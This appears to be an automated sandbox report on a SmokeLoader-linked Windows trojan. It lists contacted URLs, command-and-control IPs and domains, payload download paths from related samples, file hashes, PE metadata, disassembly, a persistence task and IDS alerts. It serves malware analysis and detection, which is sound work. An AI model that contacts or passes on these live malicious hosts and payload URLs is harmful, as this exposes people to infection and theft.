                                                      https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://wns.windows.com/eexplorer.exe, 00000002.00000000.2238006366.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000002.00000000.2232896710.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    211.171.233.129
                                                                    unknownKorea Republic of
                                                                    3786LGDACOMLGDACOMCorporationKRtrue
                                                                    125.7.253.10
                                                                    nwgrus.ruKorea Republic of
                                                                    3786LGDACOMLGDACOMCorporationKRtrue
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1532900
                                                                    Start date and time:2024-10-14 06:01:11 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 8s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:7
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@2/2@7/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 38
                                                                    • Number of non-executed functions: 13
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • VT rate limit hit for: file.exe
                                                                    TimeTypeDescription
                                                                    00:02:36API Interceptor411183x Sleep call for process: explorer.exe modified
                                                                    06:02:35Task SchedulerRun new task: Firefox Default Browser Agent B647DD7AD17A1342 path: C:\Users\user\AppData\Roaming\fbtdajh
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    211.171.233.129bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • nwgrus.ru/tmp/index.php
                                                                    rFdy6Oh3xT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                    • mzxn.ru/tmp/index.php
                                                                    file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                    • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                                                    lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                    • cajgtus.com/files/1/build3.exe
                                                                    IzXkxsTrEt.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                    • sdfjhuz.com/dl/build2.exe
                                                                    SKHOtnHl7J.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                    • trmpc.com/check/index.php
                                                                    p2xoB50aKi.exeGet hashmaliciousSmokeLoader, VidarBrowse
                                                                    • sjyey.com/tmp/index.php
                                                                    RnnWoAEP9mUhOXN_9mNdOzaP.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                                                                    • cbinr.com/forum/index.php
                                                                    qpPYm1rHOS.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                                                                    • cbinr.com/forum/index.php
                                                                    8TmTmPo08O.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, StealcBrowse
                                                                    • sjyey.com/tmp/index.php
                                                                    125.7.253.10YK85paB4RW.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                    • mzxn.ru/tmp/index.php
                                                                    E6YUQ1pon1.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                    • mzxn.ru/tmp/index.php
                                                                    3441TYcdND.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                    • mzxn.ru/tmp/index.php
                                                                    NNETz5j0y4.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                    • mzxn.ru/tmp/index.php
                                                                    75f6kL8SJ2.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                                                    • mzxn.ru/tmp/index.php
                                                                    WPC6G1Ykup.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                                                    • 100xmargin.com/tmp/index.php
                                                                    0S2jhDIWWK.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                                                    • mzxn.ru/tmp/index.php
                                                                    file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                    • mzxn.ru/tmp/index.php
                                                                    uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • gebeus.ru/tmp/index.php
                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • gebeus.ru/tmp/index.php
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    nwgrus.ru1HGXcC63iu.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 189.161.95.103
                                                                    K80v6DHFHE.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 148.230.249.9
                                                                    FyDBXJE74v.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 78.89.199.216
                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 63.143.98.185
                                                                    fTKQwp8fRa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 78.89.199.216
                                                                    LgigaSKsL6.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 190.224.203.37
                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 190.147.128.172
                                                                    mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 119.204.11.2
                                                                    uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 190.224.203.37
                                                                    wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 116.58.10.60
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    LGDACOMLGDACOMCorporationKRuSE8AyujGn.elfGet hashmaliciousMiraiBrowse
                                                                    • 210.219.31.16
                                                                    PeleHfdpzX.elfGet hashmaliciousMiraiBrowse
                                                                    • 112.222.254.29
                                                                    VwiubbxMcD.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                    • 106.250.166.45
                                                                    VwiubbxMcD.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                    • 106.250.166.45
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 123.141.118.206
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 1.211.217.206
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 1.208.17.118
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 1.218.3.77
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 115.88.245.30
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 106.244.84.81
                                                                    LGDACOMLGDACOMCorporationKRuSE8AyujGn.elfGet hashmaliciousMiraiBrowse
                                                                    • 210.219.31.16
                                                                    PeleHfdpzX.elfGet hashmaliciousMiraiBrowse
                                                                    • 112.222.254.29
                                                                    VwiubbxMcD.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                    • 106.250.166.45
                                                                    VwiubbxMcD.exeGet hashmaliciousRMSRemoteAdminBrowse
                                                                    • 106.250.166.45
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 123.141.118.206
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 1.211.217.206
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 1.208.17.118
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 1.218.3.77
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 115.88.245.30
                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                    • 106.244.84.81
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\explorer.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):274944
                                                                    Entropy (8bit):5.743757942440379
                                                                    Encrypted:false
                                                                    SSDEEP:3072:tOe0QuzbNAj5HG/NTG7U+L50CyxF9Dav/cGKt6KUCIqzpjAqMi:we0QCyj5Ho08/4/wVIqzpjAqh
                                                                    MD5:29EAF4B051758C9946539B6BA8AA475F
                                                                    SHA1:7F2CE245C72D8689AAA7460CD6D12DB57B9C36BA
                                                                    SHA-256:8001AF6BBC3CC10B1382C5EFC800E479804AD1E30F0D99A57ADD656A811AFBCD
                                                                    SHA-512:AB2C9443AB55E81D17CA452A4D0508F52E3A3AC23801E4D6375496A6FD230094B5CB2991BD467087F03D27BC3DA387973D308880402D565899177722BE5BE032
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................U.c......q......`.......v......E.....................a......d....Rich...................PE..L......d.................h....s.....".............@...........................t.............................................\...P....Pr..-...........................................................................................................text....g.......h.................. ..`.rdata...!......."...l..............@..@.data.....p.........................@....cip.....D....q..8..................@....cer.....(... r..(..................@....rsrc....-...Pr.....................@..@................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\explorer.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):5.743757942440379
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                    • InstallShield setup (43055/19) 0.43%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:file.exe
                                                                    File size:274'944 bytes
                                                                    MD5:29eaf4b051758c9946539b6ba8aa475f
                                                                    SHA1:7f2ce245c72d8689aaa7460cd6d12db57b9c36ba
                                                                    SHA256:8001af6bbc3cc10b1382c5efc800e479804ad1e30f0d99a57add656a811afbcd
                                                                    SHA512:ab2c9443ab55e81d17ca452a4d0508f52e3a3ac23801e4d6375496a6fd230094b5cb2991bd467087f03d27bc3da387973d308880402d565899177722be5be032
                                                                    SSDEEP:3072:tOe0QuzbNAj5HG/NTG7U+L50CyxF9Dav/cGKt6KUCIqzpjAqMi:we0QCyj5Ho08/4/wVIqzpjAqh
                                                                    TLSH:D344F7816AF16C13FFB64B314E39D9942A3FBCA25E7572DFA100760F187B1A1A513B12
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................U.c.......q.......`.......v......E........................a.......d.....Rich....................PE..L......d...
                                                                    Icon Hash:17694cb2b24d2117
                                                                    Entrypoint:0x401a22
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x64BAF5C9 [Fri Jul 21 21:16:57 2023 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:dc51987737c4af4f71f5c3733cf2b1f2
                                                                    Instruction
                                                                    call 00007FF694E054C2h
                                                                    jmp 00007FF694E01D3Dh
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000328h
                                                                    mov dword ptr [0041C650h], eax
                                                                    mov dword ptr [0041C64Ch], ecx
                                                                    mov dword ptr [0041C648h], edx
                                                                    mov dword ptr [0041C644h], ebx
                                                                    mov dword ptr [0041C640h], esi
                                                                    mov dword ptr [0041C63Ch], edi
                                                                    mov word ptr [0041C668h], ss
                                                                    mov word ptr [0041C65Ch], cs
                                                                    mov word ptr [0041C638h], ds
                                                                    mov word ptr [0041C634h], es
                                                                    mov word ptr [0041C630h], fs
                                                                    mov word ptr [0041C62Ch], gs
                                                                    pushfd
                                                                    pop dword ptr [0041C660h]
                                                                    mov eax, dword ptr [ebp+00h]
                                                                    mov dword ptr [0041C654h], eax
                                                                    mov eax, dword ptr [ebp+04h]
                                                                    mov dword ptr [0041C658h], eax
                                                                    lea eax, dword ptr [ebp+08h]
                                                                    mov dword ptr [0041C664h], eax
                                                                    mov eax, dword ptr [ebp-00000320h]
                                                                    mov dword ptr [0041C5A0h], 00010001h
                                                                    mov eax, dword ptr [0041C658h]
                                                                    mov dword ptr [0041C554h], eax
                                                                    mov dword ptr [0041C548h], C0000409h
                                                                    mov dword ptr [0041C54Ch], 00000001h
                                                                    mov eax, dword ptr [0041B008h]
                                                                    mov dword ptr [ebp-00000328h], eax
                                                                    mov eax, dword ptr [0041B00Ch]
                                                                    mov dword ptr [ebp-00000324h], eax
                                                                    call dword ptr [000000D8h]
                                                                    Programming Language:
                                                                    • [C++] VS2008 build 21022
                                                                    • [ASM] VS2008 build 21022
                                                                    • [ C ] VS2008 build 21022
                                                                    • [IMP] VS2005 build 50727
                                                                    • [RES] VS2008 build 21022
                                                                    • [LNK] VS2008 build 21022
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1985c0x50.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x27250000x22dd0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x180000x19c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x167af0x1680043c1bbcfda4f28a6db426899f1d4530dFalse0.80537109375data7.5080418109409415IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x180000x21b00x22008f7390606cfa5526c62a62295eb9b3afFalse0.37247242647058826data5.561090816497167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x1b0000x270121c0x16004ed3ce2f485fe937021c499d3aa5b9cbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .cip0x271d0000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .cer0x27220000x28000x28001276481102f218c981e0324180bafd9fFalse0.00322265625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x27250000x22dd00x22e0098cbbd9c6f082883c092beb04fa7479fFalse0.3801873319892473data4.840484397561957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_CURSOR0x273d6780x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                    RT_CURSOR0x273d7a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                    RT_CURSOR0x273fd780x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                    RT_CURSOR0x273fea80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                    RT_ICON0x2725b500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5674307036247335
                                                                    RT_ICON0x27269f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6376353790613718
                                                                    RT_ICON0x27272a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6849078341013825
                                                                    RT_ICON0x27279680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7456647398843931
                                                                    RT_ICON0x2727ed00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.512863070539419
                                                                    RT_ICON0x272a4780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6137429643527205
                                                                    RT_ICON0x272b5200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6163934426229508
                                                                    RT_ICON0x272bea80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7553191489361702
                                                                    RT_ICON0x272c3880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39925373134328357
                                                                    RT_ICON0x272d2300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5036101083032491
                                                                    RT_ICON0x272dad80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5264976958525346
                                                                    RT_ICON0x272e1a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5570809248554913
                                                                    RT_ICON0x272e7080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3549792531120332
                                                                    RT_ICON0x2730cb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.38320825515947465
                                                                    RT_ICON0x2731d580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.4036885245901639
                                                                    RT_ICON0x27326e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.42021276595744683
                                                                    RT_ICON0x2732bc00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39285714285714285
                                                                    RT_ICON0x2733a680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5537003610108303
                                                                    RT_ICON0x27343100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6226958525345622
                                                                    RT_ICON0x27349d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6372832369942196
                                                                    RT_ICON0x2734f400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.425422138836773
                                                                    RT_ICON0x2735fe80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4209016393442623
                                                                    RT_ICON0x27369700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.46187943262411346
                                                                    RT_ICON0x2736e400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.279317697228145
                                                                    RT_ICON0x2737ce80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.3664259927797834
                                                                    RT_ICON0x27385900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.3773041474654378
                                                                    RT_ICON0x2738c580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.3764450867052023
                                                                    RT_ICON0x27391c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.2587136929460581
                                                                    RT_ICON0x273b7680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.27345215759849906
                                                                    RT_ICON0x273c8100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.28852459016393445
                                                                    RT_ICON0x273d1980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.32180851063829785
                                                                    RT_STRING0x27426300xaadata0.5588235294117647
                                                                    RT_STRING0x27426e00x600data0.4361979166666667
                                                                    RT_STRING0x2742ce00x460data0.45
                                                                    RT_STRING0x27431400x64adata0.4360248447204969
                                                                    RT_STRING0x27437900x7b4data0.417342799188641
                                                                    RT_STRING0x2743f480x6d0data0.4294724770642202
                                                                    RT_STRING0x27446180x76cdata0.42526315789473684
                                                                    RT_STRING0x2744d880x606data0.4455252918287938
                                                                    RT_STRING0x27453900x7c2data0.42245720040281975
                                                                    RT_STRING0x2745b580x810data0.42102713178294576
                                                                    RT_STRING0x27463680x584data0.4461756373937677
                                                                    RT_STRING0x27468f00x74cdata0.4234475374732334
                                                                    RT_STRING0x27470400x710data0.4303097345132743
                                                                    RT_STRING0x27477500x5f6data0.4325032765399738
                                                                    RT_STRING0x2747d480x88data0.625
                                                                    RT_GROUP_CURSOR0x273fd500x22data1.0588235294117647
                                                                    RT_GROUP_CURSOR0x27424500x22data1.088235294117647
                                                                    RT_GROUP_ICON0x2732b480x76dataTurkishTurkey0.6694915254237288
                                                                    RT_GROUP_ICON0x273d6000x76dataTurkishTurkey0.6694915254237288
                                                                    RT_GROUP_ICON0x272c3100x76dataTurkishTurkey0.6610169491525424
                                                                    RT_GROUP_ICON0x2736dd80x68dataTurkishTurkey0.7211538461538461
                                                                    RT_VERSION0x27424780x1b4data0.5756880733944955
                                                                    DLLImport
                                                                    KERNEL32.dllOpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, QueryDosDeviceA, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, DeleteVolumeMountPointA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SearchPathW, GetNumaProcessorNode, GetConsoleFontSize, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CloseHandle, CreateFileA
                                                                    GDI32.dllGetBoundsRect
                                                                    ADVAPI32.dllClearEventLogW
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    TurkishTurkey
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-10-14T06:02:41.580888+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649862125.7.253.1080TCP
                                                                    2024-10-14T06:02:43.242369+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649873125.7.253.1080TCP
                                                                    2024-10-14T06:02:44.741563+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649884125.7.253.1080TCP
                                                                    2024-10-14T06:02:46.242232+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649895125.7.253.1080TCP
                                                                    2024-10-14T06:02:47.819583+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649906125.7.253.1080TCP
                                                                    2024-10-14T06:02:49.336141+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649917125.7.253.1080TCP
                                                                    2024-10-14T06:02:50.858357+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649928125.7.253.1080TCP
                                                                    2024-10-14T06:02:52.382811+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649939125.7.253.1080TCP
                                                                    2024-10-14T06:02:53.931040+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649949125.7.253.1080TCP
                                                                    2024-10-14T06:02:55.571568+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649960125.7.253.1080TCP
                                                                    2024-10-14T06:02:57.199668+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649972125.7.253.1080TCP
                                                                    2024-10-14T06:02:58.792799+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649983125.7.253.1080TCP
                                                                    2024-10-14T06:03:00.282605+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649994125.7.253.1080TCP
                                                                    2024-10-14T06:03:02.013801+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649996125.7.253.1080TCP
                                                                    2024-10-14T06:03:03.632852+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649997125.7.253.1080TCP
